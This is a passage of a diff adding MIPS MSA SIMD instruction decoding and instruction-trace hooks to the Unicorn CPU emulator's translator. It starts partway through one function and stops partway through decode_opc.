gen_helper_msa_adds_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SUBSUS_U_df: + gen_helper_msa_subsus_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MSUBV_df: + gen_helper_msa_msubv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_PCKEV_df: + gen_helper_msa_pckev_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SRLR_df: + gen_helper_msa_srlr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_BCLR_df: + gen_helper_msa_bclr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MAX_U_df: + gen_helper_msa_max_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_CLT_U_df: + gen_helper_msa_clt_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ADDS_U_df: + gen_helper_msa_adds_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SUBSUU_S_df: + gen_helper_msa_subsuu_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_PCKOD_df: + gen_helper_msa_pckod_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_BSET_df: + gen_helper_msa_bset_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MIN_S_df: + gen_helper_msa_min_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_CLE_S_df: + gen_helper_msa_cle_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_AVE_S_df: + gen_helper_msa_ave_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ASUB_S_df: + gen_helper_msa_asub_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DIV_S_df: + gen_helper_msa_div_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ILVL_df: + gen_helper_msa_ilvl_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_BNEG_df: + gen_helper_msa_bneg_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MIN_U_df: + gen_helper_msa_min_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_CLE_U_df: + gen_helper_msa_cle_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_AVE_U_df: + gen_helper_msa_ave_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ASUB_U_df: + gen_helper_msa_asub_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DIV_U_df: + gen_helper_msa_div_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ILVR_df: + gen_helper_msa_ilvr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_BINSL_df: + gen_helper_msa_binsl_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MAX_A_df: + gen_helper_msa_max_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_AVER_S_df: + gen_helper_msa_aver_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MOD_S_df: + gen_helper_msa_mod_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ILVEV_df: + gen_helper_msa_ilvev_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_BINSR_df: + gen_helper_msa_binsr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MIN_A_df: + gen_helper_msa_min_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_AVER_U_df: + gen_helper_msa_aver_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MOD_U_df: + gen_helper_msa_mod_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ILVOD_df: + gen_helper_msa_ilvod_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + + case OPC_DOTP_S_df: + case OPC_DOTP_U_df: + case OPC_DPADD_S_df: + case OPC_DPADD_U_df: + case OPC_DPSUB_S_df: + case OPC_HADD_S_df: + case OPC_DPSUB_U_df: + case OPC_HADD_U_df: + case OPC_HSUB_S_df: + case OPC_HSUB_U_df: + if (df == DF_BYTE) { + generate_exception(ctx, EXCP_RI); + } + switch (MASK_MSA_3R(ctx->opcode)) { + case OPC_DOTP_S_df: + gen_helper_msa_dotp_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DOTP_U_df: + gen_helper_msa_dotp_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DPADD_S_df: + gen_helper_msa_dpadd_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DPADD_U_df: + gen_helper_msa_dpadd_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DPSUB_S_df: + gen_helper_msa_dpsub_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_HADD_S_df: + gen_helper_msa_hadd_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DPSUB_U_df: + gen_helper_msa_dpsub_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_HADD_U_df: + gen_helper_msa_hadd_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_HSUB_S_df: + gen_helper_msa_hsub_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_HSUB_U_df: + gen_helper_msa_hsub_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + } + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, twt); + tcg_temp_free_i32(tcg_ctx, tdf); +} + +static void gen_msa_elm_3e(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_ELM_DF3E(op) (MASK_MSA_MINOR(op) | (op & (0x3FF << 16))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t source = (ctx->opcode >> 11) & 0x1f; + uint8_t dest = (ctx->opcode >> 6) & 0x1f; + TCGv telm = tcg_temp_new(tcg_ctx); + TCGv_i32 tsr = tcg_const_i32(tcg_ctx, source); + TCGv_i32 tdt = tcg_const_i32(tcg_ctx, dest); + + switch (MASK_MSA_ELM_DF3E(ctx->opcode)) { + case OPC_CTCMSA: + gen_load_gpr(ctx, telm, source); + gen_helper_msa_ctcmsa(tcg_ctx, tcg_ctx->cpu_env, telm, tdt); + break; + case OPC_CFCMSA: + gen_helper_msa_cfcmsa(tcg_ctx, telm, tcg_ctx->cpu_env, tsr); + gen_store_gpr(tcg_ctx, telm, dest); + break; + case OPC_MOVE_V: + gen_helper_msa_move_v(tcg_ctx, tcg_ctx->cpu_env, tdt, tsr); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free(tcg_ctx, telm); + tcg_temp_free_i32(tcg_ctx, tdt); + tcg_temp_free_i32(tcg_ctx, tsr); +} + +static void gen_msa_elm_df(CPUMIPSState *env, DisasContext *ctx, uint32_t df, + uint32_t n) +{ +#define MASK_MSA_ELM(op) (MASK_MSA_MINOR(op) | (op & (0xf << 22))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tn = tcg_const_i32(tcg_ctx, n); + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + + switch (MASK_MSA_ELM(ctx->opcode)) { + case OPC_SLDI_df: + gen_helper_msa_sldi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + case OPC_SPLATI_df: + gen_helper_msa_splati_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + case OPC_INSVE_df: + gen_helper_msa_insve_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + case OPC_COPY_S_df: + case OPC_COPY_U_df: + case OPC_INSERT_df: +#if !defined(TARGET_MIPS64) + /* Double format valid only for MIPS64 */ + if (df == DF_DOUBLE) { + generate_exception(ctx, EXCP_RI); + break; + } +#endif + switch (MASK_MSA_ELM(ctx->opcode)) { + case OPC_COPY_S_df: + gen_helper_msa_copy_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + case OPC_COPY_U_df: + gen_helper_msa_copy_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + case OPC_INSERT_df: + gen_helper_msa_insert_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + } + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + } + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, tn); + tcg_temp_free_i32(tcg_ctx, tdf); +} + +static void gen_msa_elm(CPUMIPSState *env, DisasContext *ctx) +{ + uint8_t dfn = (ctx->opcode >> 16) & 0x3f; + uint32_t df = 0, n = 0; + + if ((dfn & 0x30) == 0x00) { + n = dfn & 0x0f; + df = DF_BYTE; + } else if ((dfn & 0x38) == 0x20) { + n = dfn & 0x07; + df = DF_HALF; + } else if ((dfn & 0x3c) == 0x30) { + n = dfn & 0x03; + df = DF_WORD; + } else if ((dfn & 0x3e) == 0x38) { + n = dfn & 0x01; + df = DF_DOUBLE; + } else if (dfn == 0x3E) { + /* CTCMSA, CFCMSA, MOVE.V */ + gen_msa_elm_3e(env, ctx); + return; + } else { + generate_exception(ctx, EXCP_RI); + return; + } + + gen_msa_elm_df(env, ctx, df, n); +} + +static void gen_msa_3rf(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_3RF(op) (MASK_MSA_MINOR(op) | (op & (0xf << 22))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t df = (ctx->opcode >> 21) & 0x1; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); + TCGv_i32 tdf = tcg_temp_new_i32(tcg_ctx); + + /* adjust df value for floating-point instruction */ + tcg_gen_movi_i32(tcg_ctx, tdf, df + 2); + + switch (MASK_MSA_3RF(ctx->opcode)) { + case OPC_FCAF_df: + gen_helper_msa_fcaf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FADD_df: + gen_helper_msa_fadd_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCUN_df: + gen_helper_msa_fcun_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSUB_df: + gen_helper_msa_fsub_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCOR_df: + gen_helper_msa_fcor_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCEQ_df: + gen_helper_msa_fceq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMUL_df: + gen_helper_msa_fmul_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCUNE_df: + gen_helper_msa_fcune_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCUEQ_df: + gen_helper_msa_fcueq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FDIV_df: + gen_helper_msa_fdiv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCNE_df: + gen_helper_msa_fcne_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCLT_df: + gen_helper_msa_fclt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMADD_df: + gen_helper_msa_fmadd_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MUL_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_mul_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCULT_df: + gen_helper_msa_fcult_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMSUB_df: + gen_helper_msa_fmsub_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MADD_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_madd_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCLE_df: + gen_helper_msa_fcle_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MSUB_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_msub_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCULE_df: + gen_helper_msa_fcule_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FEXP2_df: + gen_helper_msa_fexp2_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSAF_df: + gen_helper_msa_fsaf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FEXDO_df: + gen_helper_msa_fexdo_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSUN_df: + gen_helper_msa_fsun_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSOR_df: + gen_helper_msa_fsor_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSEQ_df: + gen_helper_msa_fseq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FTQ_df: + gen_helper_msa_ftq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSUNE_df: + gen_helper_msa_fsune_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSUEQ_df: + gen_helper_msa_fsueq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSNE_df: + gen_helper_msa_fsne_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSLT_df: + gen_helper_msa_fslt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMIN_df: + gen_helper_msa_fmin_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MULR_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_mulr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSULT_df: + gen_helper_msa_fsult_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMIN_A_df: + gen_helper_msa_fmin_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MADDR_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_maddr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSLE_df: + gen_helper_msa_fsle_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMAX_df: + gen_helper_msa_fmax_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MSUBR_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_msubr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSULE_df: + gen_helper_msa_fsule_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMAX_A_df: + gen_helper_msa_fmax_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, twt); + tcg_temp_free_i32(tcg_ctx, tdf); +} + +static void gen_msa_2r(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_2R(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21)) | \ + (op & (0x7 << 18))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + uint8_t df = (ctx->opcode >> 16) & 0x3; + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + + switch (MASK_MSA_2R(ctx->opcode)) { + case OPC_FILL_df: +#if !defined(TARGET_MIPS64) + /* Double format valid only for MIPS64 */ + if (df == DF_DOUBLE) { + generate_exception(ctx, EXCP_RI); + break; + } +#endif + gen_helper_msa_fill_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); /* trs */ + break; + case OPC_PCNT_df: + gen_helper_msa_pcnt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_NLOC_df: + gen_helper_msa_nloc_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_NLZC_df: + gen_helper_msa_nlzc_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, twt); + tcg_temp_free_i32(tcg_ctx, tdf); +} + +static void gen_msa_2rf(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_2RF(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21)) | \ + (op & (0xf << 17))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + uint8_t df = (ctx->opcode >> 16) & 0x1; + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); + /* adjust df value for floating-point instruction */ + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df + 2); + + switch (MASK_MSA_2RF(ctx->opcode)) { + case OPC_FCLASS_df: + gen_helper_msa_fclass_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FTRUNC_S_df: + gen_helper_msa_ftrunc_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FTRUNC_U_df: + gen_helper_msa_ftrunc_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FSQRT_df: + gen_helper_msa_fsqrt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FRSQRT_df: + gen_helper_msa_frsqrt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FRCP_df: + gen_helper_msa_frcp_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FRINT_df: + gen_helper_msa_frint_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FLOG2_df: + gen_helper_msa_flog2_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FEXUPL_df: + gen_helper_msa_fexupl_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FEXUPR_df: + gen_helper_msa_fexupr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FFQL_df: + gen_helper_msa_ffql_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FFQR_df: + gen_helper_msa_ffqr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FTINT_S_df: + gen_helper_msa_ftint_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FTINT_U_df: + gen_helper_msa_ftint_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FFINT_S_df: + gen_helper_msa_ffint_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FFINT_U_df: + gen_helper_msa_ffint_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, twt); + tcg_temp_free_i32(tcg_ctx, tdf); +} + +static void gen_msa_vec_v(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_VEC(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); + + switch (MASK_MSA_VEC(ctx->opcode)) { + case OPC_AND_V: + gen_helper_msa_and_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_OR_V: + gen_helper_msa_or_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_NOR_V: + gen_helper_msa_nor_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_XOR_V: + gen_helper_msa_xor_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_BMNZ_V: + gen_helper_msa_bmnz_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_BMZ_V: + gen_helper_msa_bmz_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_BSEL_V: + gen_helper_msa_bsel_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, twt); +} + +static void gen_msa_vec(CPUMIPSState *env, DisasContext *ctx) +{ + switch (MASK_MSA_VEC(ctx->opcode)) { + case OPC_AND_V: + case OPC_OR_V: + case OPC_NOR_V: + case OPC_XOR_V: + case OPC_BMNZ_V: + case OPC_BMZ_V: + case OPC_BSEL_V: + gen_msa_vec_v(env, ctx); + break; + case OPC_MSA_2R: + gen_msa_2r(env, ctx); + break; + case OPC_MSA_2RF: + gen_msa_2rf(env, ctx); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void gen_msa(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint32_t opcode = ctx->opcode; + check_insn(ctx, ASE_MSA); + check_msa_access(ctx); + + switch (MASK_MSA_MINOR(opcode)) { + case OPC_MSA_I8_00: + case OPC_MSA_I8_01: + case OPC_MSA_I8_02: + gen_msa_i8(env, ctx); + break; + case OPC_MSA_I5_06: + case OPC_MSA_I5_07: + gen_msa_i5(env, ctx); + break; + case OPC_MSA_BIT_09: + case OPC_MSA_BIT_0A: + gen_msa_bit(env, ctx); + break; + case OPC_MSA_3R_0D: + case OPC_MSA_3R_0E: + case OPC_MSA_3R_0F: + case OPC_MSA_3R_10: + case OPC_MSA_3R_11: + case OPC_MSA_3R_12: + case OPC_MSA_3R_13: + case OPC_MSA_3R_14: + case OPC_MSA_3R_15: + gen_msa_3r(env, ctx); + break; + case OPC_MSA_ELM: + gen_msa_elm(env, ctx); + break; + case OPC_MSA_3RF_1A: + case OPC_MSA_3RF_1B: + case OPC_MSA_3RF_1C: + gen_msa_3rf(env, ctx); + break; + case OPC_MSA_VEC: + gen_msa_vec(env, ctx); + break; + case OPC_LD_B: + case OPC_LD_H: + case OPC_LD_W: + case OPC_LD_D: + case OPC_ST_B: + case OPC_ST_H: + case OPC_ST_W: + case OPC_ST_D: + { + int32_t s10 = sextract32(ctx->opcode, 16, 10); + uint8_t rs = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + uint8_t df = (ctx->opcode >> 0) & 0x3; + + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 trs = tcg_const_i32(tcg_ctx, rs); + TCGv_i32 ts10 = tcg_const_i32(tcg_ctx, s10); + + switch (MASK_MSA_MINOR(opcode)) { + case OPC_LD_B: + case OPC_LD_H: + case OPC_LD_W: + case OPC_LD_D: + gen_helper_msa_ld_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, trs, ts10); + break; + case OPC_ST_B: + case OPC_ST_H: + case OPC_ST_W: + case OPC_ST_D: + gen_helper_msa_st_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, trs, ts10); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tdf); + tcg_temp_free_i32(tcg_ctx, trs); + tcg_temp_free_i32(tcg_ctx, ts10); + } + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +// Unicorn: trace this instruction on request +static void hook_insn(CPUMIPSState *env, DisasContext *ctx, bool *insn_need_patch, int *insn_patch_offset, int offset_value) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, ctx->pc)) { + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_CODE_IDX, env->uc, ctx->pc); + *insn_need_patch = true; + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + *insn_patch_offset = offset_value; + } +} + +static void decode_opc (CPUMIPSState *env, DisasContext *ctx, bool *insn_need_patch, int *insn_patch_offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; +#if defined(TARGET_MIPS64) + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; +#endif + int32_t offset; + int rs, rt, rd, sa; + uint32_t op, op1; + int16_t imm; + + /* make sure instructions are on a word boundary */ + if (ctx->pc & 0x3) { + env->CP0_BadVAddr = ctx->pc; + generate_exception_err(ctx, EXCP_AdEL, EXCP_INST_NOTAVAIL); + return; + } + + /* Handle blikely not taken case */ + if ((ctx->hflags & MIPS_HFLAG_BMASK_BASE) == MIPS_HFLAG_BL) { + int l1 = gen_new_label(tcg_ctx); + + MIPS_DEBUG("blikely condition (" TARGET_FMT_lx ")", ctx->pc + 4); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, *(TCGv *)tcg_ctx->bcond, 0, l1); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->hflags, ctx->hflags & ~MIPS_HFLAG_BMASK); + gen_goto_tb(ctx, 1, ctx->pc + 4); + gen_set_label(tcg_ctx, l1); + hook_insn(env, ctx, insn_need_patch, insn_patch_offset, 14); + } else { + hook_insn(env, ctx, insn_need_patch, insn_patch_offset, 1); + } + + if 